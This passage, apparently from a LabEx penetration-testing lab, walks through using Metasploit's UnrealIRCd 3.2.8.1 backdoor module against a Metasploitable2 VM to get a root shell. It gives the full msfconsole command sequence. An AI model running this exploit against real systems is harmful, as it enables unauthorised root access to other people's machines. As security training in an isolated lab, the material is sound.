Получение root-доступа на целевой машине
На этом шаге мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа на целевой машине.
Теперь вы запустите машину-атакующую (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.
- Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
- Проверьте связь с целевой машиной, отправив ей пинги:
ping 192.168.122.102
Нажмите Ctrl+C
, чтобы остановить отправку пингов.
- Запустите контейнер Kali Linux и войдите в среду bash, выполнив следующую команду:
docker run -ti --network host b5b709a49cd5 bash
- Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102
Нажмите Ctrl+C
, чтобы остановить отправку пингов.
Теперь и машина-атакующая, и целевая машина запущены, и вы можете приступить к пенетрационному тестированию.
Примечание: Если вы случайно выйдете из текущего сеанса bash, контейнер Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash
на хост-машине, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
- В контейнере Kali Linux введите следующие команды в терминале bash Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Это запустит службу базы данных PostgreSQL, инициализирует базу данных и запустит консоль Metasploit Framework (msfconsole) для дальнейших операций.
- Найдите модуль уязвимости Unreal Ircd:
search unreal_ircd
- Используйте модуль
unix/irc/unreal_ircd_3281_backdoor
:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Установите IP-адрес цели:
set RHOST 192.168.122.102
- Эксплуатируйте уязвимость для получения доступа:
exploit
- Проверьте текущего пользователя:
whoami
Вы должны увидеть, что вы получили root-доступ на целевой машине.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку